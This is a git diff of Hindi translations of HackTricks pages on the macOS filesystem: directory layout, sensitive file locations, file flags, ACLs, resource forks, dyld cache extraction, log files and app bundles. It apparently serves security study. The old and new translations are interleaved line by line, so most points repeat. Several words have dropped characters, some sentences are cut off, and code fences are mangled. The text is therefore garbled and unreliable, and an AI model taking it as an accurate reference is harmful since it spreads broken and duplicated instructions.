* **/private**: अनसंदर्भित लेकिन उल्लिखित फ़ोल्डरों की बहुत सारी प्रतीकात्मक लिंक्स हैं जो निजी डायरेक्टरी के लिए हैं।
* **/sbin**: महत्वपूर्ण सिस्टम बाइनरी (प्रशासन से संबंधित)
* **/System**: OS X को चलाने के लिए फ़ाइल। आपको यहाँ अधिकांशत: केवल Apple विशिष्ट फ़ाइलें मिलेंगी (तीसरे पक्ष नहीं)।
* **/tmp**: फ़ाइलें 3 दिनों के बाद हटा दी जाती हैं (यह /private/tmp के लिए एक सॉफ़्ट लिंक है)
* **/Users**: उपयोगकर्ताओं के लिए होम डायरेक्टरी।
* **/usr**: कॉन्फ़िग और सिस्टम बाइनरी
* **/var**: लॉग फ़ाइलें
* **/Volumes**: माउंट की गई ड्राइव्स यहाँ दिखाई देंगी।
* **/.vol**: `stat a.txt` चलाने पर आपको `16777223 7545753 -rw-r--r-- 1 username wheel ...`ैसी कुछ प्राप्त होगी जहाँ पहला नंबर वह वॉल्यूम का आईडी नंबर है जहाँ फाइल मौजूद है और दूसरा इनोड नंबर है। आप इस फ़ाइल की सामग्री तक पहुंच सकते हैं /.vol/ के माध्यम से उस जानकारी के साथ चलाने `cat /.vol/16777223/7545753`
### एप्लिकेशन्स फोल्डर्स
### एप्लिकेशन फोल्डर
* **सिस्टम एप्लिकेशन्स** `/System/Applications` के अंतर्गत स्थित होते हैं।
* **इंस्टॉल किए गए** एप्लिकेशन्स आमतौर पर `/Applications` या `~/Applications` में इंस्टॉल किए जाते हैं।
* **एप्लिकेशन डेटा** रूट के रूप में चल रहे एप्लिकेशन्स के लिए `/Library/Application Support` में और यूजर के रूप में चल रहे एप्लिकेशन्स के लिए `~/Library/Application Support` में मिल सकता है।
* तीसरे पक्ष के एप्लिकेशन्स **daemons** जिन्हें **रूट के रूप में चलने की आवश्यकता होती है** आमतौर पर `/Library/PrivilegedHelperTools/` में स्थित होते हैं।
* **Sandboxed** एप्स `~/Library/Containers` फोल्डर में मैप किए जाते हैं। प्रत्येक एप्लिकेशन का एक फोल्डर होता है जो एप्लिकेशन के बंडल ID (`com.apple.Safari`) के अनुसार नामित होता है।
* **कर्नेल** `/System/Library/Kernels/kernel` में स्थित होता है।
* **Apple के कर्नेल एक्सटेंशन्स** `/System/Library/Extensions` में स्थित होते हैं।
* **तीसरे पक्ष के कर्नेल एक्सटेंशन्स** `/Library/Extensions` में संग्रहीत होते हैं।
* **सिस्टम एप्लिकेशन** `/System/Applications` के तहत स्थित हैं
* **स्थापित** एप्लिकेशन आम तौर पर `/Applications` या `~/Applications` में स्थापित होते हैं
* **एप्लिकेशन डेटा** `/Library/Application Support` में पाया जा सकता है जो रूट के रूप में चल रहे एप्लिकेशनों के लिए है और `~/Library/Application Support` उपयोगकर्ता के रूप में चल रहे एप्लिकेशनों के लिए है।
* **संदर्भित** एप्स को `~/Library/Containers` फ़ोल्डर में मैप किया जाता है। प्रत्येक एप्लिकेशन के पास एक फ़ोल्डर होता है जिसका नाम एप्लिकेशन के बंडल ID के अनुसार होता है (`com.apple.Safari`)।
* **कर्नेल** `/System/Library/Kernels/kernel` में स्थित है
* **Apple के कर्नेल एक्सटेंशन** `/System/Library/Extensions` में स्थित हैं
* **तीसरे पक्ष कर्नेल एक्सटेंशन** `/Library/Extensions` में स्टोर किए जाते हैं
### संवेदनशील जानकारी वाली फाइल्स
### संवेदनशील जानकारी वाली फ़ाइलें
MacOS पासवर्ड्स जैसी जानकारी कई जगहों पर स्टोर करता है:
MacOS जैसी जगहों पर पासवर्ड जैसी जानकारी स्टोर करता है:
{% content-ref url="macos-sensitive-locations.md" %}
[macos-sensitive-locations.md](macos-sensitive-locations.md)
{% endcontent-ref %}
### कमजोर pkg इंस्टॉलर्स
### वंलरेबल pkg इंस्टॉलर्स
{% content-ref url="macos-installers-abuse.md" %}
[macos-installers-abuse.md](macos-installers-abuse.md)
{% endcontent-ref %}
## OS X विशिष्ट एक्सटेंशन्स
## OS X विशेष एक्सटेंशन्स
* **`.dmg`**: Apple Disk Image फाइल्स इंस्टॉलर्स के लिए बहुत आम हैं।
* **`.kext`**: इसे विशिष्ट संरचना का पालन करना चाहिए और यह OS X का ड्राइवर संस्करण है। (यह एक बंडल है)
* **`.plist`**: जिसे प्रॉपर्टी लिस्ट भी कहा जाता है, XML या बाइनरी प्रारूप में जानकारी स्टोर करता है।
* XML या बाइनरी हो सकता है। बाइनरी वाले को पढ़ा जा सकता है:
* **`.dmg`**: Apple Disk Image फ़ाइलें इंस्टॉलर्स के लिए बहुत आम हैं।
* **`.kext`**: यह एक विशिष्ट संरचना का पालन करना चाहिए और यह ड्राइवर का OS X संस्करण है। (यह एक बंडल है)
* **`.plist`**: XML या बाइनरी स्वरूप में जानकारी स्टोर करता है।
* XML या बाइनरी हो सकता है। बाइनरी वाले को इस प्रकार से पढ़ा जा सकता है:
* `defaults read config.plist`
* `/usr/libexec/PlistBuddy -c print config.plsit`
* `plutil -p ~/Library/Preferences/com.apple.screensaver.plist`
* `plutil -convert xml1 ~/Library/Preferences/com.apple.screensaver.plist -o -`
* `plutil -convert json ~/Library/Preferences/com.apple.screensaver.plist -o -`
* **`.app`**: Apple एप्लिकेशन्स जो डायरेक्टरी संरचना का पालन करते हैं (यह एक बंडल है)।
* **`.dylib`**: डायनामिक लाइब्रेरीज़ (विंडोज DLL फाइल्स की तरह)
* **`.pkg`**: xar (eXtensible Archive format) के समान हैं। इंस्टॉलर कमांड का इस्तेमाल इन फाइल्स की सामग्री को इंस्टॉल करने के लिए किया जा सकता है।
* **`.DS_Store`**: यह फाइल प्रत्येक डायरेक्टरी में होती है, यह डायरेक्टरी के गुणों और कस्टमाइजेशन को सेव करती है।
* **`.Spotlight-V100`**: यह फोल्डर सिस्टम पर हर वॉल्यूम की रूट डायरेक्टरी पर दिखाई देता है।
* **`.metadata_never_index`**: अगर यह फाइल किसी वॉल्यूम की रूट पर है तो Spotlight उस वॉल्यूम को इंडेक्स नहीं करेगा।
* **`.noindex`**: इस एक्सटेंशन वाली फाइल्स और फोल्डर्स को Spotlight द्वारा इंडेक्स नहीं किया जाएगा
* **`.app`**: एप्पल एप्लिकेशन जो डायरेक्टरी संरचना का पालन करते हैं (यह एक बंडल है)।
* **`.dylib`**: डायनामिक लाइब्रेरीज (जैसे Windows DLL फ़ाइलें)
* **`.pkg`**: xar (eXtensible Archive format) के समान हैं। इन फ़ाइलों के सामग्री को इंस्टॉल करने के लिए इंस्टॉलर कमांड का उपयोग किया जा सकता है।
* **`.DS_Store`**: हर डायरेक्टरी पर यह फ़ाइल होती है, यह डायरेक्टरी की विशेषताएँ और कस्टमाइजेशन को सहेजती है।
* **`.Spotlight-V100`**: यह फ़ोल्डर प्रत्येक वॉल्यूम के रूट डायरेक्टरी पर दिखाई देता है।
* **`.metadata_never_index`**: यदि यह फ़ाइल किसी वॉल्यूम के रूट पर है तो Spotlight उस वॉल्यूम को इंडेक्स नहीं करेगा।
* **`.noindex`**: इस एक्सटेंशन वाली फ़ाइलें और फ़ोल्डर Spotlight द्वारा इंडेक्स नहीं की जाएंगी
### macOS बंडल्स
मूल रूप से, एक बंडल फाइल सिस्टम के भीतर एक **डायरेक्टरी संरचना** है। दिलचस्प बात यह है कि डिफ़ॉल्ट रूप से यह डायरेक्टरी Finder में एक एकल ऑब्जेक्ट की तरह दिखती है (जैसे `.app`).&#x20;
एक बंडल एक **डायरेक्टरी** है जो **फाइंडर में एक ऑब्जेक्ट की तरह दिखती है** (एक बंडल उदाहरण हैं `*.app` फ़ाइलें)।
{% content-ref url="macos-bundles.md" %}
[macos-bundles.md](macos-bundles.md)
@ -86,9 +85,11 @@ MacOS पासवर्ड्स जैसी जानकारी कई ज
## Dyld Shared Cache
macOS (और iOS) पर सभी सिस्टम शेयर्ड लाइब्रेरीज़, जैसे कि frameworks और dylibs, एक एकल फाइल में **संयुक्त किए जाते हैं**, जिसे **dyld shared cache** कहा जाता है। यह प्रदर्शन में सुधार करता है, क्योंकि कोड को तेजी से लोड किया जा सकता है।
macOS (और iOS) पर सभी सिस्टम साझा लाइब्रेरी, जैसे फ़्रेमवर्क और dylibs, को **एक ही फ़ाइल में** मिलाकर, जिसे **dyld साझा कैश** कहा जाता है। यह प्रदर्शन में सुधार करता है, क्योंकि कोड तेजी से लोड किया जा सकता है।
dyld shared cache के समान, कर्नेल और कर्नेल एक
dyld साझा कैश के समान, कर्नेल और कर्नेल एक्सटेंशन भी एक कर्नेल कैश में कॉम्पाइल किए जाते हैं, जो बूट समय पर लोड किया जाता है।
एकल फ़ाइल dylib साझा कैश से पुस्तकालयों को निकालने के लिए संभव था जिसे बाइनरी [
```bash
# dyld_shared_cache_util
dyld_shared_cache_util -extract ~/shared_cache/ /System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e
@ -100,56 +101,56 @@ dyldex_all [dyld_shared_cache_path] # Extract all
```
{% endcode %}
पुराने संस्करणों में आप **`/System/Library/dyld/`** में **साझा कैश** पा सकते हैं।
बुनियादी संस्करणों में आप **`/System/Library/dyld/`** में **`विभाजित कैश`** पा सकते हैं।
iOS में आप उन्हें **`/System/Library/Caches/com.apple.dyld/`** में पा सकते हैं।
{% hint style="success" %}
ध्यान दें कि यदि `dyld_shared_cache_util` उपकरण काम नहीं करता है, तो आप **साझा dyld बाइनरी को Hopper को पास कर सकते हैं** और Hopper सभी लाइब्रेरीज की पहचान कर सकता है और आपको **चुनने देगा कि** आप किसकी जांच करना चाहते हैं:
ध्यान दें कि यदि `dyld_shared_cache_util` उपकरण काम नहीं करता है, तो आप **साझा dyld बाइनरी को Hopper को पारित कर सकते हैं** और Hopper सभी पुस्तकालयों की पहचान करने में सक्षम होगा और आपको **जिसे आप जांचना चाहते हैं, उसे चुनने देगा**:
{% endhint %}
<figure><img src="../../../.gitbook/assets/image (680).png" alt="" width="563"><figcaption></figcaption></figure>
## विशेष फाइल अनुमतियाँ
## विशेष फाइल अनुमतियाँ
### फ़ोल्डर अनुमतियाँ
एक **फ़ोल्डर** में, **पढ़ने** की अनुमति से **सूचीबद्ध करने** की अनुमति मिलती है, **लिखने** की अनुमति से **हटाने** और फ़ोल्डर में फाइलों को **लिखने** की अनुमति मिलती है, और **निष्पादित** करने की अनुमति से डायरेक्टरी को **पार करने** की अनुमति मिलती है। इसलिए, उदाहरण के लिए, एक उपयोगकर्ता जिसके पास फ़ाइल के ऊपर **पढ़ने की अनुमति** है लेकिन वह डायरेक्टरी में **निष्पादित की अनुमति नहीं है**, वह फ़ाइल को **पढ़ नहीं पाएगा**।
**फ़ोल्डर** में, **पढ़ने** से इसे **सूचीत करने** की अनुमति होती है, **लिखने** से इसे **हटाने** और फ़ाइलों पर **लिखने** की अनुमति होती है, और **क्रियान्वयन** से निर्देशिका **चालू करने** की अनुमति होती है। इसलिए, उदाहरण के लिए, एक उपयोगकर्ता को **फ़ाइल पर पढ़ने की अनुमति** होने पर भी उस निर्देशिका में जिस पर उसके **क्रियान्वयन** की अनुमति नहीं है, **फ़ाइल पढ़ने में सक्षम नहीं होगा**।
### फ्लैग संशोधक
### ध्वज संशोधक
कुछ फ्लैग होते हैं जो फाइलों में सेट किए जा सकते हैं जिससे फाइल अलग तरह से व्यवहार करेगी। आप डायरेक्टरी के अंदर फाइलों के फ्लैग्स की **जांच** `ls -lO /path/directory` के साथ कर सकते हैं
कुछ ध्वज हैं जो फ़ाइलों में सेट किए जा सकते हैं जो फ़ाइल का व्यवहार अलग बना देंगे। आप `ls -lO /पथ/निर्देशिका` के साथ निर्देशिका में फ़ाइलों के ध्वजों की जांच कर सकते हैं।
* **`uchg`**: **uchange** फ्लैग के रूप में जाना जाता है जो **किसी भी कार्रवाई को रोकेगा** जो फाइल को बदलने या हटाने से संबंधित है। इसे सेट करने के लिए करें: `chflags uchg file.txt`
* रूट उपयोगकर्ता फ्लैग को **हटा सकता है** और फाइल को संशोधित कर सकता है
* **`restricted`**: यह फ्लैग फाइल को SIP द्वारा **संरक्षित** करता है (आप इस फ्लैग को फाइल में नहीं जोड़ सकते)।
* **`Sticky bit`**: यदि किसी डायरेक्टरी में स्टिकी बिट होता है, तो **केवल** डायरेक्टरी का मालिक या रूट ही फाइलों का नाम बदल सकता है या उन्हें हटा सकता है। आमतौर पर यह /tmp डायरेक्टरी पर सेट किया जाता है ताकि सामान्य उपयोगकर्ता अन्य उपयोगकर्ताओं की फाइलों को हटाने या स्थानांतरित करने से रोक सकें।
* **`uchg`**: **uchange** ध्वज के रूप में जाना जाता है जो किसी भी क्रिया को **बदलने या हटाने से रोकेगा**। इसे सेट करने के लिए: `chflags uchg file.txt`
* रूट उपयोगकर्ता ध्वज को **हटा सकता है** और फाइल को संशोधित कर सकता है
* **`प्रतिबंधित`**: यह ध्वज फ़ाइल को **SIP द्वारा संरक्षित** बना देगा (आप इस ध्वज को फ़ाइल में नहीं जोड़ सकते)।
* **`Sticky bit`**: यदि एक निर्देशिका में sticky bit है, **केवल** निर्देशिका के मालिक या रूट **फ़ाइलों को नाम बदल सकते हैं या हटा सकते हैं**। सामान्यत: यह /tmp निर्देशिका पर सेट किया जाता है ताकि साधारण उपयोगकर्ता अन्य उपयोगकर्ताओं की फ़ाइलों को हटाने या हटाने से रोक सकें।
### **फाइल ACLs**
### **फाइल ACLs**
फाइल **ACLs** में **ACE** (एक्सेस कंट्रोल एंट्रीज) होते हैं जहां अलग-अलग उपयोगकर्ताओं को अधिक **विस्तृत अनुमतियाँ**ी जा सकती हैं।
ाइल **ACLs** में **ACE** (पहुंच नियंत्रण प्रविष्टियाँ) होती हैं जहां विभिन्न उपयोगकर्ताओं को विभिन्न अनुमतियाँ सौंपी जा सकती हैं।
एक **डायरेक्टरी** को ये अनुमतियाँ दी जा सकती हैं: `list`, `search`, `add_file`, `add_subdirectory`, `delete_child`, `delete_child`.\
और एक **फाइल** को: `read`, `write`, `append`, `execute`.
एक **निर्देशिका** को ये अनुमतियाँ प्रदान करना संभव है: `सूची`, `खोज`, `फ़ाइल जोड़ें`, `उपनिर्देशिका जोड़ें`, `बच्चे को हटाएं`, `बच्चे को हटाएं`\
और एक **फ़ाइल** को: `पढ़ें`, `लिखें`, `जोड़ें`, `क्रियान्वित करें`
जब फाइल में ACLs होते हैं तो आप **अनुमतियों की सूची में "+" पाएंगे जैसे कि**:
जब फ़ाइल में ACLs होती हैं तो आपको **अनुमतियों को सूचीत करते समय "+" मिलेगा जैसे कि**:
```bash
ls -ld Movies
drwx------+ 7 username staff 224 15 Apr 19:42 Movies
```
आप फ़ाइल के **ACLs पढ़ सकते हैं** इसके साथ:
आप निम्नलिखित के साथ **फ़ाइल की ACLs पढ़ सकते हैं:**
```bash
ls -lde Movies
drwx------+ 7 username staff 224 15 Apr 19:42 Movies
0: group:everyone deny delete
```
आप **सभी फाइलें जिनमें ACLs हैं** इसके साथ खोज सकते हैं (यह बहुत धीमा है):
आप **सभी फ़ाइलें एसीएल के साथ** इसके साथ पा सकते हैं (यह बहुत ही धीमा है):
```bash
ls -RAle / 2>/dev/null | grep -E -B1 "\d: "
```
### रिसोर्स फोर्क्स | macOS ADS
### संसाधन फोर्क्स | macOS ADS
यह **macOS मशीनों में अल्टरनेट डेटा स्ट्रीम्स प्राप्त करने** का एक तरीका है। आप **com.apple.ResourceFork** नामक एक्सटेंडेड एट्रिब्यूट के अंदर **file/..namedfork/rsrc** में सेव करके फाइल के अंदर सामग्री सेव कर सकते हैं
यह **मैकओएस मशीनों में विकल्प डेटा स्ट्रीम्स प्राप्त करने का एक तरीका है।** आप एक फ़ाइल के अंदर **com.apple.ResourceFork** नामक विस्तारित विशेषता में सामग्री सहेज सकते हैं इसे **file/..namedfork/rsrc** में सहेजकर
```bash
echo "Hello" > a.txt
echo "Hello Mac ADS" > a.txt/..namedfork/rsrc
@ -160,7 +161,7 @@ com.apple.ResourceFork: Hello Mac ADS
ls -l a.txt #The file length is still q
-rw-r--r--@ 1 username wheel 6 17 Jul 01:15 a.txt
```
आप इस विस्तारित विशेषता वाली सभी फाइलों को **इसके साथ खोज सकते हैं**:
आप इस विस्तृत विशेषता को धारित सभी फ़ाइलें निम्नलिखित के साथ पा सकते हैं:
{% code overflow="wrap" %}
```bash
@ -168,9 +169,9 @@ find / -type f -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf
```
{% endcode %}
## **यूनिवर्सल बाइनरीज़ &** Mach-o प्रारूप
## **यूनिवर्सल बाइनरीज और** Mach-o फॉर्मेट
Mac OS बाइनरीज़ आमतौर पर **यूनिवर्सल बाइनरीज़** के रूप में संकलित की जाती हैं। एक **यूनिवर्सल बाइनरी** एक ही फ़ाइल में **कई आर्किटेक्चर्स का समर्थन कर सकती है**।
मैक ओएस बाइनरीज आम तौर पर **यूनिवर्सल बाइनरीज** के रूप में कंपाइल किए जाते हैं। एक **यूनिवर्सल बाइनरी** में **एक ही फ़ाइल में कई आर्किटेक्चर का समर्थन कर सकता है**।
{% content-ref url="universal-binaries-and-mach-o-format.md" %}
[universal-binaries-and-mach-o-format.md](universal-binaries-and-mach-o-format.md)
@ -184,36 +185,20 @@ Mac OS बाइनरीज़ आमतौर पर **यूनिवर्
## जोखिम श्रेणी फ़ाइलें Mac OS
फ़ाइल `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/System` में फ़ाइल एक्सटेंशन के आधार पर फ़ाइलों से जुड़े जोखिम शामिल होते हैं।
डायरेक्टरी `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/System` यहाँ जानकारी होती है कि **विभिन्न फ़ाइल एक्सटेंशन के साथ जुड़े जोखिम के साथ कितना संबंध है**। इस डायरेक्टरी में फ़ाइलों को विभिन्न जोखिम स्तरों में वर्गीकृत किया जाता है, जो सफारी को डाउनलोड के बाद इन फ़ाइलों का संचालन कैसे करना है पर प्रभाव डालता है। इन श्रेणियों में निम्नलिखित शामिल हैं:
संभावित श्रेणियाँ निम्नलिखित हैं:
* **LSRiskCategorySafe**: **पूरी तरह से** **सुरक्षित**; Safari डाउनलोड के बाद स्वतः खुलेगा
* **LSRiskCategoryNeutral**: कोई चेतावनी नहीं, लेकिन **स्वतः नहीं खुलेगा**
* **LSRiskCategoryUnsafeExecutable**: **चेतावनी ट्रिगर** करता है “यह फ़ाइल एक एप्लिकेशन है...”
* **LSRiskCategoryMayContainUnsafeExecutable**: यह उन आर्काइव्स के लिए है जिनमें एक एक्ज़ीक्यूटेबल होता है। यह **चेतावनी ट्रिगर करता है जब तक कि Safari सभी सामग्री को सुरक्षित या तटस्थ निर्धारित नहीं कर लेता**
- **LSRiskCategorySafe**: इस श्रेणी में फ़ाइलें **पूरी तरह सुरक्षित** मानी जाती हैं। सफारी इन फ़ाइलों को स्वचालित रूप से डाउनलोड के बाद खोलेगा।
- **LSRiskCategoryNeutral**: इन फ़ाइलों के साथ कोई चेतावनी नहीं होती और सफारी द्वारा **स्वचालित रूप से नहीं खोली जाती** है।
- **LSRiskCategoryUnsafeExecutable**: इस श्रेणी की फ़ाइलें **एक चेतावनी प्रेरित करती हैं** जिसमें इसका संवर्गन एक एप्लिकेशन है। यह उपयोगकर्ता को सूचित करने के लिए एक सुरक्षा उपाय के रूप में काम करता है।
- **LSRiskCategoryMayContainUnsafeExecutable**: यह श्रेणी फ़ाइलों के लिए है, जैसे कि आर्काइव, जो एक एक्सीक्यूटेबल शामिल कर सकते हैं। सफारी **एक चेतावनी प्रेरित करेगा** जब तक यह सत्यापित नहीं कर सकता कि सभी सामग्री सुरक्षित या न्यूट्रल है।
## लॉग फ़ाइलें
* **`$HOME/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2`**: डाउनलोड की गई फ़ाइलों के बारे में जानकारी रखता है, जैसे कि वे कहाँ से डाउनलोड की गई थीं
* **`/var/log/system.log`**: OSX सिस्टम्स का मुख्य लॉग। com.apple.syslogd.plist syslogging के निष्पादन के लिए जिम्मेदार है (आप `launchctl list` में "com.apple.syslogd" को देखकर जांच सकते हैं कि यह निष्क्रिय है या नहीं)।
* **`/private/var/log/asl/*.asl`**: ये Apple सिस्टम लॉग्स हैं जिनमें दिलचस्प जानकारी हो सकती है
* **`$HOME/Library/Preferences/com.apple.recentitems.plist`**: "Finder" के माध्यम से हाल ही में एक्सेस की गई फ़ाइलों और एप्लिकेशनों को स्टोर करता है।
* **`$HOME/Library/Preferences/com.apple.loginitems.plsit`**: सिस्टम स्टार्टअप पर लॉन्च करने के लिए आइटम्स को स्टोर करता है।
* **`$HOME/Library/Logs/DiskUtility.log`**: DiskUtility ऐप के लिए लॉग फ़ाइल (ड्राइव्स के बारे में जानकारी, यूएसबी सहित)।
* **`$HOME/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2`**: डाउनलोड की गई फ़ाइलों के बारे में जानकारी रखता है, जैसे कि उन्हें कहाँ से डाउनलोड किया गया था
* **`/var/log/system.log`**: OSX सिस्टम का मुख्य लॉग। com.apple.syslogd.plist सिस्टम लॉगिंग का निष्पादन जिम्मेदार है (आप "launchctl list" में "com.apple.syslogd" की खोज करके देख सकते हैं कि क्या यह निष्क्रिय है या नहीं)।
* **`/private/var/log/asl/*.asl`**: ये एप्पल सिस्टम लॉग हैं जो दिलचस्प जानकारी रख सकते हैं
* **`$HOME/Library/Preferences/com.apple.recentitems.plist`**: "फाइंडर" के माध्यम से हाल ही में एक्सेस की गई फ़ाइलें और एप्लिकेशन स्टोर करता है।
* **`$HOME/Library/Preferences/com.apple.loginitems.plsit`**: सिस्टम स्टार्टअप पर लॉन्च करने के लिए आइटम स्टोर करता है।
* **`$HOME/Library/Logs/DiskUtility.log`**: DiskUtility ऐप के लिए लॉग फ़ाइल (ड्राइव्स के बारे में जानकारी, इसमें USB भी शामिल हैं)।
* **`/Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist`**: वायरलेस एक्सेस पॉइंट्स के बारे में डेटा।
* **`/private/var/db/launchd.db/com.apple.launchd/overrides.plist`**: निष्क्रिय किए गए डेमन्स की सूची।
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से हीरो तक AWS हैकिंग सीखें</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप HackTricks में अपनी **कंपनी का विज्ञापन देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में शामिल हों या मुझे **Twitter** 🐦 पर **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details>

View file

@ -2,58 +2,69 @@
<details>
<summary><strong> AWS हैकिंग सीखें शून्य से लेकर हीरो तक </strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
* यदि आप अपनी कंपनी का विज्ञापन **HackTricks** में देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहत हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**.
* **अपन हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** ट्विटर पर **फॉलो** करें 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपन हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में
</details>
## मूल जानकारी
## मैकओएस बंडल्स
ूल रूप से, एक बंडल फाइल सिस्टम के भीतर एक **डायरेक्टरी संरचना** है। दिलचस्प बात यह है कि डिफ़ॉल्ट रूप से यह डायरेक्टरी **Finder में एकल ऑब्जेक्ट की तरह दिखती है**.&#x20;
ैकओएस में बंडल्स एप्लिकेशन, लाइब्रेरीज़, और अन्य आवश्यक फ़ाइलों को समेत करने वाले संसाधनों के एक संग्रह के रूप में काम करते हैं, जिन्हें फाइंडर में एकल वस्तुओं के रूप में प्रदर्शित किया जाता है, जैसे परिचित `*.app` फ़ाइलें। सबसे आम बंडल `.app` बंडल है, हालांकि अन्य प्रकार जैसे `.framework`, `.systemextension`, और `.kext` भी प्रसारित हैं।
हम जिस **सामान्य** बंडल से अक्सर मिलेंगे वह है **`.app` बंडल**, लेकिन कई अन्य एक्जीक्यूटेबल्स भी बंडल्स के रूप में पैक किए जाते हैं, जैसे कि **`.framework`** और **`.systemextension`** या **`.kext`**.
### बंडल के महत्वपूर्ण घटक
एक बंडल के भीतर समाहित संसाधनों के प्रकार में एप्लिकेशन, लाइब्रेरीज, इमेजेज, डॉक्यूमेंटेशन, हेडर फाइल्स, आदि शामिल हो सकते हैं। ये सभी फाइलें `<application>.app/Contents/` के अंदर होती हैं।
```bash
बंडल के भीतर, विशेष रूप से `<application>.app/Contents/` निर्देशिका के भीतर, कई महत्वपूर्ण संसाधन संग्रहित होते हैं:
- **_CodeSignature**: इस निर्देशिका में कोड-साइनिंग विवरण संग्रहित होते हैं जो एप्लिकेशन की अखंडता की पुष्टि के लिए आवश्यक होते हैं। आप इस्तेमाल करके कोड-साइनिंग जानकारी की जांच कर सकते हैं:
%%%bash
openssl dgst -binary -sha1 /Applications/Safari.app/Contents/Resources/Assets.car | openssl base64
%%%
- **MacOS**: एप्लिकेशन के एक्सीक्यूटेबल बाइनरी को संचालित करने वाला निर्देशिका।
- **Resources**: एप्लिकेशन के उपयोगकर्ता इंटरफ़ेस संघटन के लिए एक भंडार है जिसमें छवियाँ, दस्तावेज़, और इंटरफ़ेस विवरण (nib/xib फ़ाइलें) शामिल हैं।
- **Info.plist**: एप्लिकेशन का मुख्य कॉन्फ़िगरेशन फ़ाइल के रूप में काम करता है, जिसे सिस्टम को एप्लिकेशन को सही ढंग से पहचानने और इंटरैक्ट करने के लिए महत्वपूर्ण माना जाता है।
#### Info.plist में महत्वपूर्ण कुंजी
`Info.plist` फ़ाइल एप्लिकेशन कॉन्फ़िगरेशन के लिए एक मूलभूत है, जिसमें CFBundleExecutable, CFBundleIdentifier, LSMinimumSystemVersion जैसी कुंजियाँ शामिल हैं।
### बंडल की खोज
`Safari.app` जैसे बंडल की सामग्री की खोज करने के लिए निम्नलिखित कमांड का उपयोग किया जा सकता है:
%%%bash
ls -lR /Applications/Safari.app/Contents
```
* `Contents/_CodeSignature` -> एप्लिकेशन के **कोड-साइनिंग जानकारी** शामिल होती है (जैसे कि हैशेज आदि)।
* `openssl dgst -binary -sha1 /Applications/Safari.app/Contents/Resources/Assets.car | openssl base64`
* `Contents/MacOS` -> **एप्लिकेशन का बाइनरी** शामिल होता है (जो यूजर द्वारा एप्लिकेशन आइकन पर डबल-क्लिक करने पर निष्पादित होता है)।
* `Contents/Resources` -> **एप्लिकेशन के UI तत्व** शामिल होते हैं, जैसे कि इमेजेज, दस्तावेज़, और nib/xib फाइलें (जो विभिन्न यूजर इंटरफेस का वर्णन करती हैं)।
* `Contents/Info.plist` -> एप्लिकेशन की मुख्य "**कॉन्फ़िगरेशन फ़ाइल।**" Apple का कहना है कि "सिस्टम इस फ़ाइल की उपस्थिति पर निर्भर करता है ताकि \[एप्लिकेशन] और किसी भी संबंधित फ़ाइलों के बारे में प्रासंगिक जानकारी की पहचान कर सके"।
* **Plist** **फ़ाइलें** कॉन्फ़िगरेशन जानकारी शामिल करती हैं। आप plist कीज़ के अर्थ के बारे में जानकारी [https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Introduction/Introduction.html](https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Introduction/Introduction.html) में पा सकते हैं।
* एप्लिकेशन का विश्लेषण करते समय रुचि के जोड़े हो सकते हैं:\\
%%%
* **CFBundleExecutable**
